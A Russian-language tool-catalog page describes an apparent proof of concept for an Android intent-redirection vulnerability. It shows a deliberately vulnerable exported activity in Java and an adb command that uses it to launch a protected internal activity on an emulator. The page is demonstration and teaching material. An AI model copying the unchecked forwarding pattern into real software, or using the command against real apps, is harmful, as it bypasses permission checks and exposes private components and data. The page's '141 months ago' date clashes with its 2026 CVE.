Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Эксплойт-концепт для CVE-2026-22010 — перенаправление intent в Android: демонстрирует экспортированную activity, пересылающую intent внутренним компонентам, контролируемым атакующим, в обход проверок разрешений, с уязвимым Java-кодом и шагами эксплуатации через adb. | Kitploit
Инструменты/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Безопасность AndroidАнализ уязвимостейЭксплуатацияПентестинг мобильных приложенийМобильная безопасностьОбучение и Образование
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Эксплойт-концепт для CVE-2026-22010 — перенаправление intent в Android: демонстрирует экспортированную activity, пересылающую intent внутренним компонентам, контролируемым атакующим, в обход проверок разрешений, с уязвимым Java-кодом и шагами эксплуатации через adb.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
141 месяц назадЕщё не проверено

CVE-2026-22010 – Перенаправление Intent в Android на экспортируемый компонент

Программный код (имитация Java/Android)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Перенаправление Intent в Android на экспортируемый компонент

Severity: High

Обзор

Экспортированная активность Android вслепую перенаправляет входящие Intent на компонент, указанный в extras этого Intent. Злоумышленник может сформировать Intent, который заставит приложение запустить защищённую внутреннюю активность с управляемыми атакующим данными, обходя проверки разрешений.

Детали уязвимости

  • Тип: перенаправление Intent / обход разрешений
  • Воздействие: доступ к приватным компонентам, кража данных.
  • Корневая причина: приложение не проверяет целевой компонент (имя пакета и класса) перед пересылкой Intent.

Демонстрация эксплойта

Разверните уязвимое приложение на эмуляторе Android. Отправьте Intent через adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

Внутренняя активность запускается без необходимых разрешений.

Скачать инструмент